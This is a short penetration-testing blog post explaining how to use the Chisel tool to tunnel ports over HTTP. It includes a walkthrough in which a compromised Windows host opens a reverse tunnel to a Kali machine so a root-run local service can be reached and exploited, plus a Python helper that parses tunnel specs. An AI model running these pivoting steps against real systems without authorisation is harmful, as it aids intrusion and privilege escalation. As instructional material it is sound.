
Daniel Cano Merchán - Hacking & Tech

Port forwarding with Chisel over HTTP

2020-09-23 #Hacking

This time I want to talk about Chisel, an amazing tool written in Go, simple to use and multi-OS, which enables port forwarding over HTTP. This post is just minimal notes on how to use Chisel with a practical example.

Getting Chisel and more info

Source code and full documentation for Chisel can be found on GitHub.

There are precompiled binaries on the releases page: Chisel releases.

Port forwarding

Two modes are needed, client and server. Example with two machines:

machine 1: Deploying the server

chisel server -p PORT --reverse

machine 2: Connecting to the Chisel server

chisel client IP_SERVER_CHISEL:PORT_SERVER_CHISEL R:PORT1:IP:PORT2

Practical example

There is a remote server cracked with a low-privileged account, and we want to run a certain exploit from our own machine for practical reasons: for example, there is no Python on the server, and getting the exploit to work by precompiling the source is hard.

Another example can be redirecting a local port of the cracked server so it can be reached from our local machine; there are infinite reasons.

In the example, inside the cracked machine there is a service running with root privileges on port 8080, bound only to the localhost interface 127.0.0.1, and we know an exploit to escalate privileges through it.

Deploying the Chisel server on the pentest machine using the precompiled version for Linux:

./chisel server -p 9003 --reverse
2020/09/23 09:16:55 server: Reverse tunnelling enabled
2020/09/23 09:16:55 server: Fingerprint XXXXXXXXXXXXX
2020/09/23 09:16:55 server: Listening on 0.0.0.0:9003...

So this time a VM with Kali is listening on port 9003 (on all interfaces, 0.0.0.0) and awaiting remote connections.

--reverse: Allow clients to specify reverse port forwarding remotes in addition to normal remotes.

On the remote server (Windows), start the precompiled Chisel and reverse-connect the remote localhost port 8080 to port 8080 on the Kali machine:

.\chisel.exe client 1.2.3.4:9003 R:8080:127.0.0.1:8080
2020/09/23 09:17:08 client: Connecting to ws://1.2.3.4:9003
2020/09/23 09:17:08 client: Fingerprint XXXXXXXXXXXXX
2020/09/23 09:17:09 client: Connected (Latency 47.968ms)

Now the remote localhost port 8080 can be accessed on Kali: it is reverse-connected to port 8080 on the Windows machine.

Port 8080 can be used directly on Kali's loopback, and the traffic will land on the Windows remote server, so it is possible to run the exploit like this:

python exploit.py 127.0.0.1 8080
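To make the R:PORT1:IP:PORT2 syntax concrete, here is an added Python helper (my own code, not part of Chisel or of this post) that parses a remote spec and says which machine listens where; the assumption that an omitted local-host binds 0.0.0.0 comes from Chisel's README, not from this post. It also flags the hygiene point worth remembering from the example above: with R:8080:127.0.0.1:8080 the Kali box exposes the pivoted port on every interface, so anyone who can reach Kali on 8080 reaches the root service on Windows, whereas R:127.0.0.1:8080:127.0.0.1:8080 keeps it on Kali's loopback only.

```python
from dataclasses import dataclass

# Chisel remote grammar (from the Chisel README):
#   [R:]<local-host>:<local-port>:<remote-host>:<remote-port>[/udp]
# Assumption: when <local-host> is omitted, the listener binds 0.0.0.0.


@dataclass(frozen=True)
class Remote:
    reverse: bool      # "R:" prefix: the chisel *server* opens the listener
    listen_host: str   # interface the listener binds
    listen_port: int
    target_host: str   # where relayed traffic is delivered, seen from the far side
    target_port: int
    udp: bool


def _port(text: str) -> int:
    port = int(text)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {text}")
    return port


def parse_remote(spec: str) -> Remote:
    """Parse one Chisel remote argument such as R:8080:127.0.0.1:8080 (IPv4 only)."""
    reverse = spec.startswith("R:")
    body = spec[2:] if reverse else spec
    udp = body.endswith("/udp")
    if udp:
        body = body[: -len("/udp")]
    parts = body.split(":")
    if len(parts) == 4:
        listen_host, listen_port, target_host, target_port = parts
    elif len(parts) == 3:  # local-host omitted: assumed default 0.0.0.0
        listen_host, (listen_port, target_host, target_port) = "0.0.0.0", parts
    else:
        raise ValueError(f"unsupported remote: {spec!r}")
    if not target_host:
        raise ValueError(f"remote host required: {spec!r}")
    return Remote(reverse, listen_host or "0.0.0.0", _port(listen_port),
                  target_host, _port(target_port), udp)


def exposed_to_network(remote: Remote) -> bool:
    """True if the tunnel endpoint accepts connections from any interface."""
    return remote.listen_host in ("0.0.0.0", "::")


def describe(remote: Remote, server: str, client: str) -> str:
    """Plain-language summary: who listens, and where relayed traffic lands."""
    listener, far_side = (server, client) if remote.reverse else (client, server)
    proto = "udp" if remote.udp else "tcp"
    return (f"{listener} listens on {remote.listen_host}:{remote.listen_port}/{proto}; "
            f"traffic is relayed to {remote.target_host}:{remote.target_port} "
            f"as seen from {far_side}")
```

Running describe(parse_remote("R:8080:127.0.0.1:8080"), "kali", "windows") yields "kali listens on 0.0.0.0:8080/tcp; traffic is relayed to 127.0.0.1:8080 as seen from windows", which is exactly the situation in the example.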

Happy hacking